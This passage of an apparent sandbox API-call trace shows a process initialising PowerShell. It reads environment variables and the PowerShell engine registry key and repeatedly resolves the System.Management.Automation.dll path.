(cb=0x104) returned 0x1ef390 [0079.912] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="C:") returned 0x2 [0079.912] CoTaskMemFree (pv=0x1ef390) [0079.912] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.912] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b [0079.912] CoTaskMemFree (pv=0x1ef390) [0079.912] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.913] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.914] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.915] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.915] GetCurrentProcessId () returned 0x340 [0079.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.917] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.918] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.920] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.921] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.922] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd418 | out: phkResult=0xcd418*=0x30c) returned 0x0 [0079.923] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd39c, lpData=0x0, lpcbData=0xcd398*=0x0 | out: lpType=0xcd39c*=0x1, lpData=0x0, lpcbData=0xcd398*=0x56) returned 0x0 [0079.923] CoTaskMemAlloc (cb=0x5a) returned 0x1b8f05b0 [0079.923] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd36c, lpData=0x1b8f05b0, lpcbData=0xcd368*=0x56 | out: lpType=0xcd36c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd368*=0x56) returned 0x0 [0079.923] CoTaskMemFree (pv=0x1b8f05b0) [0079.923] RegCloseKey (hKey=0x30c) returned 0x0 [0079.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.924] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.925] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcce20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xccd70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.933] CoTaskMemAlloc (cb=0x104) returned 0x1ef390 [0079.933] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1ef390, nSize=0x80 | out: lpBuffer="") returned 0x0 [0079.933] CoTaskMemFree (pv=0x1ef390) [0079.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.934] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.935] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.936] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.937] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.938] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.939] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.940] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.941] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbdb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0079.942] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbe60, lpFilePart=0x0 | out: 